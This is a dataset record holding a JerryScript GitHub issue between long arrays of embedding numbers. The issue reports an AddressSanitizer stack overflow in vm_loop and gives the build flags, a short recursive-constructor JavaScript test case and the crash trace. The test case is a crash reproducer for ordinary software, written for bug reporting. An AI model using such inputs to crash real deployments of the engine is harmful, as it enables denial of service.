0.005159277934581041, -0.028865646570920944, 0.014812827110290527, -0.027506403625011444, 0.028339488431811333, 0.011012792587280273, 0.011517028324306011, 0.0015236677136272192, -0.002007806673645973, 0.03677264228463173, 0.011158947832882404, -0.026468701660633087, -0.018444783985614777, 0.006573329214006662, 0.010369709692895412, 0.005115431267768145, 0.006741407327353954, 0.039666514843702316, -0.010398941114544868, 0.009522009640932083, 0.007453913800418377, -0.0033414727076888084, -0.009587779641151428, 0.008542770519852638, -0.0007901514181867242, -0.0119043393060565, 0.006350442301481962, 0.01892709545791149, -0.006737753748893738, -0.002992527326568961, -0.0015949183143675327, -0.01902940310537815, -0.015170907601714134, 0.020534802228212357, 0.007413721177726984, -0.006576982792466879, -0.00572928274050355, -0.009098160080611706, 0.005356587003916502, -0.0012459729332476854, -0.015609373338520527, 0.012613192200660706, 0.002833583392202854, 0.0032135869842022657, 0.004450425039976835, -0.02122173085808754, -0.019190175458788872, 0.0072894892655313015, -0.005816976074129343, 0.004212922882288694, -0.027608713135123253, -0.009617011062800884, 0.019833257421851158, 0.007194488774985075, 0.006171402521431446, 0.0015775624196976423, 0.011115101166069508, -0.011137024499475956, 0.0017465543933212757, -0.013066273182630539, -0.0014743403298780322, 0.013248967006802559, 0.006332173012197018, 0.02158712036907673, -0.00956585630774498, 0.01346089132130146, 0.0022599243093281984, -0.018985558301210403, 0.006536790169775486, 0.004348116461187601, 0.011911646462976933, 0.012021263130009174, 0.003920612391084433, 0.015697065740823746, 0.010143169201910496, 0.00853546243160963, 0.006788908038288355, -0.011707029305398464, 0.009821628220379353, -0.006039862520992756, -0.01740708202123642, -0.005327356047928333, -0.0078046866692602634, -0.009967783465981483, 0.011312410235404968, 0.004797543864697218, -0.00017926846339832991, -0.020534802228212357, -0.021411733701825142, 0.014118590392172337, -0.0020352108404040337, -0.02088557556271553, 0.02642485685646534, -0.009332007728517056, 0.0008673396077938378, -0.005564858205616474, -0.01837170496582985, 0.0015912645030766726, -0.011400103569030762, -0.01800631731748581, -0.014184359461069107, 0.001219482277520001, -0.016778614372015, -0.008323537185788155, -0.0003235967014916241, 0.015200138092041016, -0.011012792587280273, -0.0008495269576087594, 0.003476666286587715, -0.01790400967001915, 0.0022617513313889503, 0.003715995466336608, -0.00686198566108942, 0.023501751944422722, -0.016793230548501015, -0.013168581761419773, 0.0002298518520547077, 0.017260925844311714, 0.002871949225664139, 0.005791398696601391, 0.003717822255566716, -0.00852084718644619, 0.0007362567121163011, 0.007143334485590458, 0.002784256124868989, -0.030429508537054062, -0.0008846955606713891, -0.03855573385953903, 0.003325030207633972, 0.00901777483522892, 0.008447769097983837, 0.004033883102238178, 0.008294306695461273, 0.009098160080611706, -0.017421696335077286, -0.001319963950663805, 0.015112445689737797, 0.005564858205616474, -0.0073187206871807575, 0.013643586076796055, -0.0023311751428991556, 0.002044345485046506, 0.010976254008710384, -0.01286165602505207, 0.05062815174460411, -0.009909320622682571, 0.021177886053919792, 0.022390972822904587, -0.008330845274031162, -0.0032884913962334394, -0.00906892865896225, -0.021543273702263832, 0.003953497391194105, 0.0065696751698851585, -0.006259095389395952, -0.007885071448981762, 0.0012103475164622068, 0.0005037786322645843, -0.014527824707329273, -0.002791563980281353, -0.007326028309762478, -0.0068583316169679165, 0.008542770519852638, -0.0007600068929605186, 0.002638100879266858, 0.01142202690243721, 0.015828605741262436, -0.007435644511133432, 0.005466203670948744, -0.0032446449622511864, 0.012481652200222015, -0.009836243465542793, 0.015507063828408718, -0.007738916669040918, 0.024714840576052666, 0.004969276022166014, -0.013811664655804634, 0.004004651680588722, 0.021397117525339127, 0.018108626827597618, -0.003513205097988248, 0.022887900471687317, -0.011319718323647976, 0.00807507336139679, 0.0076073771342635155, -0.006902178283780813, -0.004136191681027412, 0.014469362795352936, -0.005360241048038006, -0.00468427361920476, 0.010844714008271694, 0.0042238845489919186, 0.03314799442887306, 0.014052820391952991, -0.027433326467871666, 0.01753862202167511, 0.008791234344244003, 0.01680784486234188, -0.0030966626945883036, 0.013979742303490639, -0.004402924794703722, 0.002060787985101342, 0.0010669328039512038, -0.00934662390500307, -0.016091685742139816, -0.032709527760744095, -0.007972764782607555, 0.007943534292280674, -0.019906334578990936, -0.00956585630774498, 0.0043298471719026566, 0.04562964662909508, -0.016267070546746254, 0.03504801169037819, 0.008871619589626789, -0.010333171114325523, 0.0012925599003210664, -0.0008015697821974754, 0.003655706299468875, -0.013519354164600372, 0.012971271760761738, -0.00018029611965175718, -0.00042385002598166466, 0.008506231009960175, -0.01544860191643238, 0.011173563078045845, -0.010618173517286777, -0.010033552534878254, -0.006492943502962589, -0.010172400623559952, -0.011283179745078087, 0.01208703313022852, -0.003668494988232851, 0.016427841037511826, 0.03922804817557335, 0.006189671810716391, 0.0062298644334077835, -0.004581964574754238, -0.02360406145453453, -0.019380176439881325, -0.01445474661886692, 0.02088557556271553, 0.0080385347828269, 0.007885071448981762, 0.025606386363506317, 0.003378011519089341, -0.006821793038398027, 0.007004486862570047, 0.014527824707329273, 0.025489462539553642, 0.008966620080173016, 0.011232024990022182, -0.0029998349491506815, 0.00976316537708044, 0.011261256411671638, 0.005904668942093849, -0.01886863261461258, -0.005901015363633633, 0.012569345533847809, -0.002703870879486203, -0.01873709447681904, -0.010106630623340607, -0.001024913159199059, -0.024188682436943054, -0.020242491737008095, -0.004976583644747734, 0.009427009150385857, 0.014915135689079762, -0.010420864447951317, -0.00790699478238821, 0.008009303361177444, 0.019190175458788872, 0.00627371110022068, -0.017626313492655754, 0.015755528584122658, -0.02088557556271553, 0.010362401604652405, -0.002398771932348609, 0.0029084880370646715, 0.007790070958435535, 0.00045719166519120336, 0.027433326467871666, -0.0023549252655357122, 0.007782763335853815, -0.00352233974263072, 0.06647137552499771, -0.018152473494410515, -0.014177052304148674, -0.0002484637952875346, -0.008060458116233349, 0.0052615865133702755, 0.015112445689737797, -0.011626644060015678, -0.032241832464933395, 0.017597083002328873, 0.02407175675034523, 0.029961811378598213, 0.010771636851131916, -0.009244315326213837, 0.011948185972869396, -0.005422357004135847, 0.014118590392172337, -0.0055356272496283054, 0.0006590685225091875, -0.003323203418403864, 0.020944036543369293, -0.004556387662887573, 0.02778409980237484, 0.004585618618875742, 0.00545524200424552, 0.0025741581339389086, -0.00853546243160963, 0.008009303361177444, 0.0022233857307583094, 0.013840895146131516, -0.018254781141877174, 0.006109286565333605, 0.011078562587499619, 0.006120248232036829, -0.006927755195647478, -0.0015382831916213036, -0.005027737934142351, 0.022829439491033554, -0.0020772304851561785, 0.012817809358239174, 0.018678631633520126, -0.021937891840934753, 0.0019201136892661452, 0.013833587057888508, -0.01445474661886692, -0.013672816567122936, -0.0049729300662875175, 0.019190175458788872, 0.0058900536969304085, 0.009733934886753559, 0.004143499303609133, 0.020944036543369293, 0.004015613347291946, -0.0001583728299010545, 0.013884741812944412, 0.01657399721443653, 0.00214665406383574, 0.014878597110509872, -0.04720812290906906, 0.011217409744858742, 0.004432155750691891, -0.006712176371365786, 0.03551570698618889 ]
77
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 3bcd48f7 ###### Build platform ``` Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64) ``` ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ``` function fun() { var a = f; function f() { var ret = new a(0); } f(); } fun(); ``` ###### Output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==31424==ERROR: AddressSanitizer: stack-overflow on address 0xff0f5f1c (pc 0x566a1e67 bp 0xff0f6468 sp 0xff0f5f20 T0) #0 0x566a1e66 in vm_loop /home/jerryscript/jerry-core/vm/vm.c:1024 #1 0x566c055e in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5231 #2 0x566c0bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #3 0x56621029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 #4 0x566222ee in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1572 #5 0x566a1c87 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:884 ... #241 0x566c0601 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5258 #242 0x566c0bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #243 0x56621029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 #244 0x566222ee in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1572 #245 0x566a1c87 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:884 #246 0x566c0601 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5258 SUMMARY: AddressSanitizer: stack-overflow /home/jerryscript/jerry-core/vm/vm.c:1024 in vm_loop ==31424==ABORTING ```
stack-overflow in vm_loop
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4746/comments
0
2021-08-24T03:32:28
2021-10-20T14:03:38Z
https://github.com/jerryscript-project/jerryscript/issues/4746
977,667,116
4,746
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : stack-overflow in vm_loop Issue date: --- start body --- ###### JerryScript revision 3bcd48f7 ###### Build platform ``` Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64) ``` ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ``` function fun() { var a = f; function f() { var ret = new a(0); } f(); } fun(); ``` ###### Output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==31424==ERROR: AddressSanitizer: stack-overflow on address 0xff0f5f1c (pc 0x566a1e67 bp 0xff0f6468 sp 0xff0f5f20 T0) #0 0x566a1e66 in vm_loop /home/jerryscript/jerry-core/vm/vm.c:1024 #1 0x566c055e in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5231 #2 0x566c0bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #3 0x56621029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 #4 0x566222ee in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1572 #5 0x566a1c87 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:884 ... #241 0x566c0601 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5258 #242 0x566c0bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #243 0x56621029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 #244 0x566222ee in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1572 #245 0x566a1c87 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:884 #246 0x566c0601 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5258 SUMMARY: AddressSanitizer: stack-overflow /home/jerryscript/jerry-core/vm/vm.c:1024 in vm_loop ==31424==ABORTING ``` --- end body ---
2,229
[ -0.040903449058532715, 0.0025794650427997112, -0.0072890231385827065, 0.01558294054120779, 0.018654238432645798, -0.006846727803349495, -0.0045149484649300575, 0.031533870846033096, -0.03495900332927704, 0.020918788388371468, -0.009680954739451408, 0.03790292143821716, 0.0018806387670338154, 0.005201390013098717, 0.04098837077617645, 0.00758624542504549, -0.022730428725481033, -0.0003677683707792312, -0.016630295664072037, -0.023140879347920418, 0.00020710467651952058, 0.009412039071321487, -0.039969321340322495, 0.04933890327811241, -0.00825145747512579, -0.013934064656496048, 0.019871434196829796, -0.011570439673960209, -0.02294273115694523, -0.001303001306951046, -0.0011508518364280462, 0.014507278800010681, -0.02972223050892353, 0.03133572265505791, 0.03178863227367401, 0.02718876302242279, 0.023296566680073738, 0.05140530318021774, -0.00620274618268013, -0.009305888786911964, -0.003173909615725279, -0.018866539001464844, -0.04506456106901169, 0.03671403229236603, 0.019206222146749496, 0.05599102005362511, 0.03623281419277191, 0.01989974081516266, -0.05477382242679596, 0.03289259970188141, 0.045149482786655426, -0.018130559474229813, 0.010593852028250694, -0.04602699726819992, 0.003027067519724369, -0.008293917402625084, 0.010593852028250694, -0.004844015929847956, 0.01661614142358303, 0.023239953443408012, 0.02952408231794834, -0.0166586022824049, 0.011167066171765327, 0.009567727334797382, 0.016007544472813606, 0.054207686334848404, -0.023622095584869385, 0.024485455825924873, 0.011110452935099602, 0.0034640550147742033, 0.006032905075699091, -0.0052190818823874, 0.033996570855379105, 0.04577223211526871, 0.012936246581375599, 0.0033897494431585073, -0.00912897102534771, 0.04144128039479256, -0.011443058028817177, -0.025419583544135094, 0.0031066806986927986, 0.016998285427689552, -0.005059855990111828, 0.02601402811706066, 0.010480624623596668, 0.004238956142216921, -0.01634722575545311, -0.05749128386378288, -0.023622095584869385, -0.018272094428539276, -0.01336084958165884, 0.03682725876569748, -0.016998285427689552, 0.03393995761871338, -0.01688505709171295, -0.007090874947607517, -0.039573024958372116, 0.0012729252921417356, -0.030712971463799477, 0.015271564945578575, -0.0022167828865349293, -0.002512236125767231, -0.009504036977887154, 0.007303176447749138, -0.006726423744112253, 0.04381905868649483, 0.010034791193902493, -0.01696997880935669, 0.06550212949514389, 0.08956298232078552, 0.002275165868923068, -0.04766879603266716, -0.03391164913773537, -0.009235121309757233, -0.020848020911216736, 0.023975932970643044, 0.002535235369578004, -0.012292264960706234, -0.0117190508171916, 0.013516537845134735, -0.0189939197152853, 0.004270801320672035, -0.026735853403806686, -0.04107329249382019, -0.02543373592197895, 0.02110278233885765, 0.01082738395780325, -0.010381550528109074, 0.014974342659115791, -0.02192368358373642, -0.049565356224775314, -0.021201856434345245, 0.016955824568867683, -0.025929106399416924, 0.024980826303362846, -0.04313969239592552, -0.011888892389833927, 0.02867487445473671, -0.013247622177004814, -0.031420644372701645, -0.05044287070631981, -0.013176855631172657, 0.003655126551166177, 0.019446831196546555, 0.029354240745306015, 0.000789054436609149, -0.010091404430568218, 0.03382672742009163, -0.025759266689419746, -0.012108270078897476, 0.0034180565271526575, -0.020041275769472122, 0.008909592404961586, 0.04144128039479256, 0.0054030767641961575, -0.024556223303079605, -0.005717990919947624, 0.024754371494054794, 0.016134925186634064, 0.0022840118035674095, -0.05754789710044861, -0.02836349979043007, -0.017054898664355278, -0.037591543048620224, -0.059784144163131714, -0.0038072760216891766, -0.00006015213148202747, 0.030175140127539635, 0.0031880629248917103, 0.0057852198369801044, -0.026806620880961418, -0.001965559320524335, 0.05389631167054176, 0.05304710194468498, -0.02718876302242279, -0.007734856568276882, 0.016941670328378677, 0.01814471371471882, 0.0020982478745281696, -0.022617202252149582, 0.019715745002031326, -0.0009314734488725662, -0.03538360819220543, 0.01464881282299757, 0.02309841848909855, -0.002161938464269042, -0.004932474810630083, -0.042064033448696136, 0.010876921005547047, -0.05182990804314613, 0.014946036040782928, -0.006970570422708988, 0.01794656552374363, -0.009235121309757233, 0.014259593561291695, 0.02551865763962269, -0.014946036040782928, -0.011216603219509125, -0.012497490271925926, 0.004688328132033348, 0.025872493162751198, -0.03815768286585808, -0.04384736716747284, 0.016361379995942116, -0.03634604066610336, -0.02742937207221985, 0.001852331799454987, -0.017805030569434166, 0.023579636588692665, 0.013134394772350788, -0.0061319791711866856, -0.00165064528118819, 0.01583770290017128, -0.06284128874540329, -0.017776723951101303, -0.009051126427948475, 0.00758624542504549, 0.012363032437860966, -0.027669981122016907, -0.019107148051261902, 0.0007244793232530355, -0.019984660670161247, -0.007416403852403164, -0.030712971463799477, -0.006630887743085623, -0.021272623911499977, -0.025603577494621277, -0.008124075829982758, -0.04475318640470505, -0.009001589380204678, 0.015979235991835594, 0.01623399928212166, -0.006156747695058584, 0.011676589958369732, 0.028604106977581978, -0.011075069196522236, -0.023041805252432823, 0.004309723153710365, 0.02145661972463131, 0.01989974081516266, -0.008060385473072529, 0.014344514347612858, -0.05780265852808952, -0.029863763600587845, 0.014174672774970531, 0.01814471371471882, -0.022886116057634354, -0.014379898086190224, -0.026778314262628555, -0.020154502242803574, 0.006432739552110434, -0.016134925186634064, -0.02340979501605034, -0.04424366354942322, -0.011634130030870438, 0.016601989045739174, 0.008414221927523613, 0.04444181174039841, -0.035751596093177795, -0.003435748163610697, -0.0023777782917022705, 0.05335848033428192, -0.032552916556596756, 0.032439690083265305, 0.0029651462100446224, -0.01084153726696968, -0.019206222146749496, -0.0011977350804954767, -0.001303001306951046, -0.011683667078614235, 0.028533341363072395, -0.024598684161901474, -0.02121601067483425, -0.001340154092758894, 0.014861115254461765, 0.0028678413946181536, -0.008336378261446953, 0.018824078142642975, 0.013799606822431087, -0.01139352098107338, 0.03453440219163895, 0.006418586242944002, 0.026155563071370125, 0.024400535970926285, -0.013424540869891644, 0.0209895558655262, 0.07280530780553818, -0.0362045057117939, 0.012745175510644913, -0.02072064019739628, -0.023905165493488312, -0.01145013514906168, 0.0003998347674496472, 0.0014179979916661978, 0.04288493096828461, 0.010537237860262394, -0.0072890231385827065, 0.012320571579039097, -0.01170489750802517, 0.0029757614247500896, 0.008470835164189339, -0.02941085398197174, -0.009390809573233128, 0.0024874676018953323, -0.023353179916739464, 0.007373943459242582, -0.008109922520816326, 0.001928406534716487, -0.009312964975833893, 0.0030394517816603184, 0.06425663083791733, -0.03634604066610336, -0.006068288814276457, -0.029580695554614067, 0.013467000797390938, -0.007968388497829437, 0.023310720920562744, -0.009383732452988625, -0.023806091398000717, 0.0035383605863898993, -0.04313969239592552, -0.005940907634794712, -0.05095239356160164, 0.01595092937350273, 0.05004657432436943, 0.00861944630742073, -0.033600274473428726, 0.011598746292293072, -0.045347630977630615, 0.015653707087039948, 0.010579698719084263, -0.040280699729919434, -0.030288368463516235, -0.0070519526489079, -0.015285718254745007, -0.03238307684659958, -0.04169604182243347, 0.03679895028471947, 0.014118059538304806, -0.03654418885707855, -0.015158337540924549, -0.011103375814855099, -0.005148314870893955, 0.003853274742141366, 0.004614022560417652, -0.012030426412820816, 0.004695404786616564, 0.007734856568276882, 0.016361379995942116, 0.010261246003210545, 0.0008447836153209209, 0.014818654395639896, 0.026466937735676765, 0.0012428491609171033, 0.04557408392429352, -0.029948685318231583, -0.043592602014541626, -0.02609894797205925, 0.0035012078005820513, 0.03849736601114273, 0.0016586065758019686, -0.022914424538612366, 0.003356135217472911, 0.010551391169428825, -0.04305477440357208, -0.0019372524693608284, 0.017408734187483788, -0.012624870985746384, -0.020296037197113037, -0.027316143736243248, -0.03011852689087391, 0.039657946676015854, -0.0035277456045150757, -0.0153281781822443, -0.021400004625320435, -0.04302646592259407, 0.005413691978901625, -0.01191719900816679, -0.00807453878223896, 0.0036409732419997454, -0.01191719900816679, -0.0026484630070626736, 0.04520609602332115, -0.01747950166463852, 0.005817065015435219, 0.001211003982461989, -0.033600274473428726, 0.030061911791563034, -0.025886647403240204, 0.00820899661630392, -0.027839822694659233, 0.01657368242740631, -0.06119948625564575, -0.021442465484142303, 0.0013702302239835262, 0.019800666719675064, -0.014386974275112152, -0.0348740816116333, -0.010395703837275505, -0.042148951441049576, -0.014747886918485165, -0.013863297179341316, -0.004472488071769476, -0.015398945659399033, -0.006846727803349495, 0.011209527030587196, 0.011216603219509125, -0.015356485731899738, 0.004960781894624233, 0.008782211691141129, 0.035015616565942764, -0.045857153832912445, -0.01723889261484146, 0.000826207222416997, 0.047498952597379684, 0.005728606134653091, 0.053698163479566574, -0.02130093052983284, -0.04783863574266434, 0.007168718613684177, -0.019163761287927628, -0.02449961006641388, 0.028462573885917664, 0.011740281246602535, -0.005116469692438841, -0.006478738505393267, 0.003435748163610697, 0.0012693868484348059, -0.024159926921129227, 0.013212238438427448, 0.008102846331894398, -0.011924275197088718, 0.04200741648674011, 0.039261650294065475, -0.027528446167707443, -0.04670635983347893, -0.022178445011377335, -0.03745000809431076, -0.04045053943991661, -0.007649935781955719, 0.026127254590392113, 0.02871733531355858, -0.015101723372936249, -0.02941085398197174, -0.002161938464269042, -0.00825145747512579, -0.05313202366232872, -0.004054961260408163, 0.006860881578177214, 0.0006811344064772129, 0.015498019754886627, 0.026622625067830086, -0.00003463723260210827, 0.0032889063004404306, 0.018158867955207825, -0.008357607759535313, -0.016630295664072037, -0.0001629857433727011, -0.001761218998581171, 0.0009447422926314175, -0.00010913631558651105, 0.006068288814276457, 0.009532343596220016, 0.005035087466239929, -0.008838824927806854, 0.02972223050892353, 0.0005970983766019344, -0.027202917262911797, -0.01314854808151722, -0.03999762982130051, 0.03226985037326813, 0.01719643361866474, -0.02625463716685772, 0.036374349147081375, -0.007161641959100962, -0.01496018934994936, -0.006255821790546179, -0.02781151421368122, 0.013700532726943493, -0.013820837251842022, -0.000541811459697783, -0.021385852247476578, -0.028490880504250526, 0.03793122619390488, 0.025249741971492767, -0.006294743623584509, 0.030288368463516235, 0.03546852618455887, 0.032864294946193695, 0.019800666719675064, 0.029241012409329414, 0.01125198695808649, -0.039657946676015854, -0.05228281766176224, -0.008860055357217789, -0.03074127808213234, -0.02118770405650139, 0.009638494811952114, 0.03190185874700546, 0.003736509010195732, 0.026778314262628555, -0.06623811274766922, 0.024485455825924873, 0.02867487445473671, -0.015866009518504143, -0.0020487108267843723, -0.02434392087161541, 0.03272275999188423, -0.009985254146158695, -0.03671403229236603, 0.0025423122569918633, -0.02469775825738907, 0.004568023607134819, -0.012900862842798233, -0.032241541892290115, -0.027627520263195038, 0.016248151659965515, 0.01743704080581665, 0.032637838274240494, 0.00941911619156599, -0.017224740236997604, -0.004355722106993198, 0.010254168882966042, 0.02234828658401966, 0.014443588443100452, -0.013601458631455898, 0.02125847153365612, 0.013820837251842022, -0.0037612775340676308, -0.022687967866659164, -0.01830040104687214, 0.01903638057410717, -0.03246799856424332, 0.05168837308883667, -0.00858406350016594, -0.028066277503967285, -0.006577812600880861, 0.028618261218070984, 0.015809396281838417, 0.01062923576682806, 0.02457037754356861, 0.011336907744407654, -0.02980715036392212, 0.02754260040819645, 0.004203572403639555, 0.009511113166809082, -0.014344514347612858, 0.0038603516295552254, 0.0018965613562613726, 0.01992804743349552, -0.009468653239309788, -0.010544314980506897, 0.005887832026928663, 0.014677120372653008, -0.002583003370091319, -0.005144776310771704, -0.0005643685581162572, 0.007122720126062632, -0.0042460327968001366, 0.0014374590246006846, 0.0007479210034944117, -0.002330010524019599, 0.004458334296941757, -0.002811227459460497, -0.03628942742943764, 0.011089222505688667, 0.0010013560531660914, 0.04033731296658516, -0.03773307800292969, 0.025929106399416924, 0.021230164915323257, -0.0018063330790027976, 0.014181749895215034, -0.041837576776742935, 0.0018788694869726896, 0.018342861905694008, 0.0017373351147398353, -0.006185054313391447, 0.006032905075699091, -0.013849143870174885, 0.021046169102191925, -0.004840477369725704, 0.012065810151398182, 0.03210000693798065, -0.014875268563628197, -0.03660080209374428, 0.004083268344402313, 0.006432739552110434, 0.011351061053574085, -0.027528446167707443, -0.005357078276574612, -0.002315856982022524, -0.03320397809147835, -0.0063195121474564075, 0.032751064747571945, -0.007437634281814098, -0.004192957654595375, 0.010523084551095963, 0.020338498055934906, -0.030769584700465202, 0.0018487934721633792, 0.008477912284433842, 0.015880161896348, -0.025914954021573067, -0.005473843775689602, 0.03136402741074562, -0.00005257782686385326, -0.005236773751676083, 0.018045639619231224, 0.022093523293733597, -0.033798422664403915, 0.04149789363145828, 0.02714630402624607, 0.0027634596917778254, -0.02169722691178322, -0.0013658072566613555, -0.013509460724890232, 0.014988495968282223, -0.020027121528983116, 0.02438638173043728, 0.021017862483859062, -0.054632287472486496, -0.016715215519070625, -0.0014984958106651902, -0.007833930663764477, 0.046989429742097855, -0.01868254505097866, -0.01563955470919609, -0.014195903204381466, -0.019248683005571365, 0.0012755789794027805, -0.02972223050892353, 0.00015281295054592192, -0.018809925764799118, -0.00936250202357769, 0.018088100478053093, 0.01630476675927639, 0.012355955317616463, -0.014946036040782928, -0.01728135347366333, -0.010098481550812721, 0.028391806408762932, -0.0002762132789939642, -0.02394762448966503, -0.026070641353726387, -0.0016037620371207595, -0.014011908322572708, 0.003409210592508316, 0.002765228971838951, 0.04325292259454727, 0.013566074892878532, 0.01970159262418747, -0.00219909125007689, 0.014089751988649368, 0.006751192267984152, -0.001559532480314374, 0.044187046587467194, 0.06538890302181244, -0.012773482128977776, 0.004950166679918766, -0.040592074394226074, -0.033883340656757355, -0.011096298694610596, 0.012865479104220867, 0.007550861686468124, -0.03787461295723915, -0.022985190153121948, 0.032043393701314926, -0.00758624542504549, 0.0016170308226719499, -0.01336084958165884, 0.022645508870482445, 0.00483693927526474, 0.009185584262013435, -0.009631417691707611, -0.004468949511647224, 0.009312964975833893, 0.010148018598556519, -0.009737568907439709, 0.024287307634949684, -0.022022757679224014, 0.010898150503635406, -0.0038957351353019476, 0.023607943207025528, -0.005969214718788862, -0.008159459568560123, -0.021484926342964172, 0.01369345560669899, 0.0047767870128154755, 0.014804501086473465, -0.0014746118104085326, 0.03679895028471947, 0.04662144184112549, 0.00881759449839592, 0.0001671875361353159, -0.005781681276857853, 0.019276989623904228, 0.007126258220523596, 0.004596330691128969, -0.025575270876288414, -0.003987732343375683, -0.005424306727945805, -0.027684133499860764, 0.001670990837737918, 0.01817302033305168, 0.01207288634032011, 0.002986376406624913, -0.0065247369930148125, 0.015030955895781517, -0.0023689325898885727, 0.0041504972614347935, 0.024004239588975906, -0.02800966240465641, 0.02376363053917885, 0.0033897494431585073, -0.03374180942773819, 0.021003708243370056, 0.005622454918920994, -0.03713863343000412, -0.002255704952403903, -0.02394762448966503, -0.028066277503967285, -0.04062037914991379, -0.03702540695667267, 0.007543785031884909, -0.013375003822147846, 0.005059855990111828, 0.011343983933329582, -0.0034729009494185448, 0.008265610784292221, -0.0079966951161623, -0.05955768749117851, -0.017564423382282257, 0.002349471440538764, -0.06301112473011017, 0.026113102212548256, -0.012716867960989475, -0.010098481550812721, 0.003152679419144988, -0.011811047792434692, -0.01568201370537281, 0.018583470955491066, -0.0036763567477464676, -0.01767764985561371, -0.0013366157654672861, -0.04506456106901169, -0.007373943459242582, 0.007805623579770327, -0.0330907478928566, 0.0069634937681257725, -0.006875034887343645, 0.038752127438783646, 0.019177915528416634, -0.008916668593883514, -0.010487700812518597, 0.011959658935666084, 0.0007589783635921776, -0.014818654395639896, 0.014033138751983643, 0.02660847268998623, 0.006779498886317015, 0.006294743623584509, -0.002130093052983284, 0.014047292061150074, 0.006620272994041443, -0.012915016151964664, 0.0019779435824602842, -0.036459267139434814, 0.0018275632755830884, -0.00031026999931782484, -0.005074009299278259, -0.028915483504533768, -0.028377652168273926, -0.007628705818206072, 0.015158337540924549, -0.0344211719930172, 0.0011048531159758568, 0.03849736601114273, 0.010176325216889381, 0.0071970256976783276, -0.019998814910650253, 0.02036680467426777, -0.0055163041688501835, 0.03866720572113991, 0.000020912264517392032, 0.02258889377117157, -0.0014799194177612662, -0.0026750005781650543, 0.019913893193006516, 0.02281535044312477, -0.015540480613708496, -0.024782678112387657, 0.00766408909112215, 0.013113164342939854, 0.002715691924095154, -0.03456270694732666, -0.017776723951101303, 0.024046698585152626, 0.0013136164052411914, -0.018286248669028282, 0.03827090933918953, 0.030486516654491425, -0.013488231226801872, 0.03159048408269882, -0.020296037197113037, -0.0035118230152875185, -0.009369579143822193, -0.016644448041915894, -0.016064157709479332, 0.03218492865562439, -0.017182279378175735, 0.007713626138865948, -0.004040807951241732, -0.00859821680933237, 0.011209527030587196, -0.001120775705203414, 0.01728135347366333, -0.01783333718776703, 0.008640676736831665, 0.03705371171236038, -0.00430264649912715, -0.0017691802931949496, 0.021230164915323257, -0.009596033953130245, 0.0035418991465121508, 0.014011908322572708, 0.041724350303411484, -0.0014179979916661978, 0.016375532373785973, -0.00017293737619183958, 0.0013834990095347166, -0.013650995679199696, -0.011789818294346333, 0.004093883093446493, -0.016559528186917305, 0.02263135462999344, 0.00429203175008297, 0.01743704080581665, -0.02960900217294693, 0.028335193172097206, 0.010664619505405426, 0.002494544256478548, 0.03365688771009445, -0.000917320023290813, -0.019673286005854607, -0.035043925046920776, -0.0033702885266393423, 0.02363624982535839, -0.0122710345312953, -0.03249630331993103, 0.03277937322854996, 0.03572329133749008, 0.008201920427381992, 0.009412039071321487, -0.007883467711508274, -0.004005424212664366, 0.024754371494054794, 0.006591965910047293, 0.009213890880346298, 0.0052190818823874, 0.004327415022999048, 0.013113164342939854, 0.01117414329200983, -0.04387567192316055, 0.025447890162467957, 0.006089518778026104, -0.01723889261484146, -0.05548149719834328, -0.0004807747609447688, -0.037817999720573425, -0.019333602860569954, -0.0388653539121151, 0.034307945519685745, 0.0077277799136936665, 0.0165453739464283, 0.0011243141489103436, -0.014118059538304806, -0.00011698705202434212, -0.0016055312007665634, 0.00495370477437973, 0.0035525141283869743, 0.02667924016714096, -0.04362091049551964, -0.010466471314430237, 0.0031084499787539244, -0.017026592046022415, -0.00484755402430892, -0.0404222309589386, 0.011768587864935398, -0.02980715036392212, 0.005930292420089245, -0.00374004733748734, -0.012978707440197468, -0.020734794437885284, 0.02874564193189144, 0.02867487445473671, -0.00030142409377731383, -0.010813230648636818, 0.026198022067546844, 0.022574741393327713, -0.00786223728209734, -0.008201920427381992, -0.01164120715111494, -0.041526202112436295, -0.009489883668720722, -0.013254699297249317, 0.037704773247241974, -0.0067476537078619, 